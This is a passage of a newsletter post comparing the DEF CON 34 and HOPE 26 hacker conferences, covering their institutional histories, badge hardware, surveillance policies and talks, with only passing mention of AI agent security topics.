href="/__u/ctolunchnyc.substack.com/p/cto-lunch-nyc-summer-2026#&amp;#167;a-tale-of-two-hackers">A Tale of Two Hackers </a><br><a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-nyc-summer-2026#&amp;#167;deep-in-security">Deep In Security</a> <br><a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-nyc-summer-2026#&amp;#167;model-mayhem">Model Mayhem</a> <br><a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-nyc-summer-2026#&amp;#167;tokens-go-brrrr">Tokens Go Brrrr</a><br><a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-nyc-summer-2026#&amp;#167;you-better-you-better-you-bet">You Better You Bet</a> </p></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!-fbZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!-fbZ!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!-fbZ!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!-fbZ!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!-fbZ!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!-fbZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg" width="1456" height="819" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:819,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:422296,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!-fbZ!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!-fbZ!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!-fbZ!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!-fbZ!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd711d96b-4ac7-4f69-a317-9116829cab8e_1920x1080.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h1><strong>A Tale of Two Hackers</strong></h1><blockquote><h5><em>It was the best of security conferences, it was the worst of security conferences.</em></h5></blockquote><p>One drew nearly thirty thousand people through the Las Vegas strip. The other scrambled to get nine hundred into the New Yorker Hotel.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-9" href="#footnote-9" target="_self">9</a>  The delta between DEF CON and Hackers On Planet Earth is less about the difference in their headcount, per se, and more like a longitudinal study in what happens when two conferences born from identical cultural soil make opposite organizational decisions across three decades. And for only the second time in HOPE&#8217;s history,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-10" href="#footnote-10" target="_self">10</a>  the calendar inverted this summer, with HOPE landing on the heels of Nevada rather than preceding it. (A change of sequence that feels like it portended much more that anyone&#8217;s admitting.)</p><p>While past HOPE editions anchored their schedules around marquee headliners (Steve Wozniak, Cory Doctorow, Jello Biafra returning more times than a Dead Kennedys encore,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-11" href="#footnote-11" target="_self">11</a>  not to mention that time we got to see <a href="https://www.youtube.com/watch?v=Te0-HgJzyw8&amp;t=3s">Hackers</a> author Steven Levy hacked live and and in real time following his keynote),<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-12" href="#footnote-12" target="_self">12</a>  this year HOPE 26 featured no actual keynotes, no singular main-stage address, no manufactured narrative for the weekend, and no elevated platform for an industry luminary to set the agenda. Instead, the conference distributed its energy across panels on age assurance, civil liberties, and telephone archaeology, alongside a reunion celebrating the thirty-first anniversary of the film Hackers, with Renoly Santiago headlining as Phantom Phreak, the King of NYNEX<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-13" href="#footnote-13" target="_self">13</a>, in a session that carried, depending on your vintage, either deep nostalgia or a certain archival poignancy. The absence of any keynotes seemed to reflect HOPE&#8217;s organizational philosophy: a conference that refuses to construct the kind of elevated institutional platform that commercially successful events deploy to signal importance, and the outcome lands flat, unpolished, and intensely communal, which constitutes both HOPE&#8217;s deepest asset and the structural reason it cannot <em>compound</em> the way its counterpart in the desert does.</p><p>Call it the two hacker problem. DEF CON is just one event at what&#8217;s effectively become hacker summer camp (which also includes Black Hat and B-Sides) and what now operates, without significant exaggeration, as a fully functional hacker industrial complex: an enormous self-reinforcing ecosystem in which security researchers, state actors, corporate vendors, students, academics, and the deeply weird co-exist inside a machine that manufactures reasons to return every year. The ecosystem sustains itself through a flywheel of professional incentives: corporate expense accounts fund attendance, recruiters line the halls, government agencies maintain presences, universities send students, and the teenager who presents a hardware bypass in a Las Vegas village this summer and returns a decade later as an enterprise CISO, brought back on someone else&#8217;s expense account, bringing colleagues, sponsoring villages, and recruiting from the CTF. You don&#8217;t merely attend hacker summer camp; you participate in its supply chain. HOPE took the opposite path. Born from 2600 and the phone phreaking underground, it remained a discrete gathering driven almost entirely by volunteer labor and direct ticket sales, no structural cushion against small shifts in economics or attendance; a month before HOPE 26, organizers appealed for ticket purchases just to cover the baseline venue costs to keep the conference viable. Which describes a cultural institution running more on mulishness rather than structural surplus.</p><div class="callout-block" data-callout="true"><p style="text-align: justify;"><strong>A generational vocabulary problem compounds everything else</strong>: In the <strong>1990s</strong>, hacker culture centered on phreaking, bulletin board systems, 2600, civil liberties, and phone networks; by the <strong>2000s</strong> it had migrated to exploit research, malware analysis, and reverse engineering; by the <strong>2010s</strong> to cloud security, bug bounties, and offensive enterprise tooling; and by the <strong>2020s</strong> to AI security, agentic failure modes, and supply chain integrity. DEF CON absorbed each successive layer without discarding the previous ones, while HOPE retained its 1990s civil liberties and surveillance-resistance core, a vital and urgently necessary perspective whose primary cultural vocabulary predates the modern software engineering workforce by twenty years.</p></div><p style="text-align: justify;">The compounding problem also manifests physically. While DEF CON itself has not been immune to venue challenges, the desert summer camp it gave rise to spent three decades expanding across Las Vegas resorts, building a relationship with the strip that feels, at this point, like geological permanence. HOPE spent over twenty years anchored at Manhattan&#8217;s Hotel Pennsylvania, whose demolition set off a brutal sequence of displacements: to St. John&#8217;s University in Queens, through COVID-19 disruption, and then to an abrupt cancellation by St. John&#8217;s earlier this year after the university declared its &#8220;edgy content&#8221; no longer welcome on campus. Scrambling to secure the New Yorker with only a few months of runway demonstrated extraordinary organizational grit, and the fact that the emergency setup attracted more speaker and workshop submissions than any prior edition, plus a wave of returnees absent for decades, suggests the underlying community appetite remains intact. But constant displacement forces an institution to spend its capital rebuilding foundations rather than gaining momentum, and DEF CON and hacker summer camp <strong>compounded</strong> over thirty years while HOPE spent those same years farming <strong>accumulation</strong>. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!_M-a!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!_M-a!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!_M-a!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!_M-a!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!_M-a!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!_M-a!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg" width="1200" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1200,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:217752,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdcdb0d73-c5c2-4af3-9ea3-2d73393da7cf_1200x1200.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!_M-a!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!_M-a!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!_M-a!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!_M-a!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F285dc1b5-3d63-4137-843c-348bcc18b65d_1200x948.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption"><strong>Close-up of the transparent, removable Baochip-1x module on the DEF CON 34 &#8220;HUMAN&#8221; badge containing an open-source RISC-V chip and doubles as a fully inspectable hardware security token (FIDO, TOTP, password manager)</strong> </figcaption></figure></div><p>At DEF CON, legendary hardware hacker Andrew &#8220;bunnie&#8221; Huang based its legendary conference badge around the Baochip-1x, a custom open-source microchip allowing attendees to inspect internal silicon and RAM arrays directly through infrared light, with a detachable core module functioning as a reusable FIDO hardware security token and password manager, a 350 MHz RISC-V processor running a Rust-based operating system, and a multi-color LED mesh that shifts patterns as badges communicate. Fabbing a badge with a custom designed chip amounts to a vertically integrated hardware engineering project, requiring the institutional resources, supply chain management, and sustained organizational capacity that a conference supported by thirty thousand attendees and deep vendor relationships can actually bring to bear. The onboard video module was intentionally nerfed for surveillance concerns, reduced to QR code duty only. HOPE&#8217;s badge ran on a standard ESP32-C3 with integrated LiPo battery management, produced in purple and black PCB tiers, with IR transceivers enabling blasts across room distances and on-site clinics where attendees spent the weekend soldering modifications and flashing custom firmware. The HOPE badge operates as participatory, open community hardware; the DEF CON badge as an engineered product. Both express genuine hacker values, but the difference in institutional capacity can be seen reads clearly in the bill of materials.</p><h4>Technical Specs: HOPE 26 Badge </h4><ul><li><p><strong>Core Hardware:</strong> <span>Built around an </span><strong><span>ESP32-C3</span></strong><span> Wi-Fi/BLE microcontroller with integrated USB, powered via an onboard LiPo battery management system (MCP73871 charge controller and MAX17048 fuel gauge).</span></p></li><li><p><strong>Interactive IR Mesh &amp; Haptics:</strong> <span>Equipped with a VSMY1850 IR transmitter and IRM-H638 receiver.</span> <span>Badgeholders can execute &#8220;IR blasts&#8221; to neighboring badges within line-of-sight, triggering synchronized LED animations and driving an onboard haptic vibration motor on target badges.</span></p></li><li><p><strong>Blinkenlights &amp; Display:</strong> Features 16 addressable WS2812B RGB LEDs arrayed for custom lighting patterns. <span>Pro-tier variants integrated an ST7789V color TFT LCD display for rendering custom interface pages, contact QR codes, and hardware telemetry.</span></p></li><li><p><strong>Sensor Suite &amp; Security:</strong> <span>Included an ST25DV04K dynamic NFC tag for tap-to-share data, an SGP30 air quality sensor (eCO2 and TVOC monitoring), and an ATECC608A cryptographic co-processor for key storage and crypto experiments.</span></p></li></ul><div class="pullquote"><p>That contrast between DEF CON and HOPE manifests most sharply <br>where both conferences appear to agree: the explicit ban on surveillance.  </p></div><p>DEF CON has historically been anti-surveillance as a hacker norm while simultaneously being an enormous gathering of people whose professional lives seem to involve building, testing, selling, deploying, or governing surveillance/security systems; they prohibit covert surveillance on-site, while the wider attendee ecosystem of hacker summer camp spends the rest of the year building surveillance capability for export; red-team tooling, exploit chains, the entire offensive pipeline that becomes someone else&#8217;s detection infrastructure downstream. The video module was nerfed and smart glasses are prohibited (including prescription lens) even where they don&#8217;t technically enable &#8220;covert&#8221; recording, but the policy isn&#8217;t &#8220;against&#8221; surveillance;  it&#8217;s a local norm of reciprocal legibility&#8212;albeit clumsily enforced&#8212;placed on top of a community that goes home and builds surveillance infrastructure.</p><p>HOPE also prohibits surveillance on-site and holds the line the way Dune&#8217;s post-Jihad culture holds its sacred taboo against thinking machines. Their prohibition isn&#8217;t sitting adjacent to a capability engine; it&#8217;s the thing being protected. With nothing left over to compound once the norm holds. Surveillance at HOPE is more of a political problem than an attack surface: who has the power to watch whom, what institutions should be permitted to collect information, how people resist. Tony Spencer&#8217;s &#8220;The Watchers You Fed&#8221; didn&#8217;t argue against surveillance in the abstract; it mapped precise mechanics linking federal surveillance purchases, commercial data brokers, and municipal license-plate readers, and documented cases where residents altered those contracts through public-records requests and local political pressure. </p><div class="pullquote"><p>HOPE answered the question by circumscribing the culture.<br>Hacker Summer Camp answered the question by industrializing it.</p></div><p>That focus on foundational questioning runs through the strongest programming at HOPE 26. Phillip Hallam-Baker, who contributed to the CERN team that developed the Web and later made major contributions to WebPKI, Web Services Security, and SAML, delivered &#8220;<strong>To Kill the Telephone System&#8217;s Ghost</strong>,&#8221; treating the PSTN as an obsolete, abuse-degraded legacy network and arguing for a security-native replacement from the ground up, which ofc captures classic hacker instinct: <mark data-color="#ffff00" style="background-color: rgb(255, 255, 0); color: rgb(0, 0, 0);">confronting global infrastructure everyone else has accepted as immutable and demanding a total redesign</mark>. Kwame Wright and Jarone Wright&#8217;s &#8220;<strong>Grokking the Agentic Loop</strong>&#8221; proved HOPE has not calcified into a 2600 museum, tracking the transition as software moves from conversational chatbots to tool-using autonomous loops. All three talks trace a coherent trajectory across infrastructure critique, emerging computation, and surveillance power.</p><p>The exact same problem space that surfaced at DEF CON the previous weekend, operating at an entirely different institutional scale. Where HOPE discussed the agentic loop in a conference room, Vegas&#8217; AI Village ran HalCTF, a competition in which participants deploy autonomous AI agents in OCI containers that independently scout, exploit, and capture flags inside sandboxed environments, with no human hands on the targets. Avishai Efrat and Roey Ben Chaim&#8217;s &#8220;Total Recon&#8221; took the analysis further, enumerating thousands of internet-exposed AI agents in the wild,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-14" href="#footnote-14" target="_self">14</a> mapping excessive permissions and documenting the attack surfaces available to anyone who goes looking. AI security at DEF CON 34 saturated the entire ecosystem, spreading across AI, Recon, AppSec, ICS, and BIC Villages in a sweep covering ChatGPT sandbox escapes, supply-chain tooling, and live hackbots, even as HOPE 26 spent the weekend asking whether we understand the agentic loop. </p><p>The same gap can be seen in sessions like Mallory Knodel&#8217;s &#8220;I-Stars: Protocols and Power,&#8221; (which deserves careful handling given that Mallory and I go back a long way) which takes on one of HOPE&#8217;s perennial questions (who gets to decide the rules of the Internet?) by dissecting standards bodies through the lens of censorship and privacy. But a platform functions as a social coordination system before it functions as software, and moderation, ranking, and community enforcement represent the mechanisms through which a population decides who gets to participate in a shared reality, which makes &#8220;censorship&#8221; a dangerously thin analytical category: one that collapses state suppression, platform moderation, algorithmic ranking, and peer ostracism into a single morally loaded word. Those mechanisms differ radically from one another, and censorship inheres in a tribe before it inheres in any protocol. The most consequential forms of control now operate several layers above the protocol, which makes the conversation precisely right for HOPE, where standards bodies bake these decisions into infrastructure before anyone outside the working groups notices.</p><div class="pullquote"><p>The 900 who attended HOPE this represent the community that HOPE has <em><strong>accumulated</strong></em>. DEF CON built something that <em><strong>compounded</strong></em>: credentials became careers became firms became the 30,000 headcount talent pipeline for every CISO role in the Fortune 500.</p></div><p>I&#8217;ll warrant a thesis here and tell me if I&#8217;m wrong in the comments: HOPE still asks hacker questions, while DEF CON has built an industry capable of answering security questions at scale. DEF CON succeeded by turning hacker culture into an institution without entirely destroying the subcultural weirdness that gave it life, while HOPE remained interesting by refusing to become RSA Conference with cooler t-shirts, a stance that also explains why it cannot match thirty years of compounding institutional investment with volunteer coordination and whatever hotel will take nine hundred grungy hackers on short notice. The fact that the New Yorker event attracted so much depth on so little runway suggests the community hasn&#8217;t gone away; as an institution it simply struggles to convert community into sustained scale. That constitutes a very different problem than the alternative, a more tractable one.</p><p>That divergence, one institution optimizing for capability, one for judgment, turns out not to be just a story about two conferences. It&#8217;s the story of every technology. A Model-T, a robot, an H100, an emergent intelligence: what each was built to optimize for is what it becomes, what is it made to do, and what is it prevented from doing. Which in every case entails a capability with an associated judgement about how it gets used. </p><p>Chris Inglis, former National Cyber Director, put the Asimov frame on it at Black Hat:<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-15" href="#footnote-15" target="_self">15</a>  We trained these models to complete the task first. Not to hurt no one first. Not to protect themselves second. Complete the task: that sits as the first rule. <mark data-color="#ffff00" style="background-color: rgb(255, 255, 0); color: rgb(0, 0, 0);">Asimov thought very long and very hard about the problem and put task completion last in his famous three laws.</mark> We reversed the order, then expressed surprise when the dog dug under the fence after we closed the gate. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!GwwR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!GwwR!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png 424w, /__u/substackcdn.com/image/fetch/$s_!GwwR!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png 848w, /__u/substackcdn.com/image/fetch/$s_!GwwR!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png 1272w, /__u/substackcdn.com/image/fetch/$s_!GwwR!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!GwwR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40c486fd-c273-4c4d-90d2-000e4de5e811_1699x926.png" width="1456" height="794" 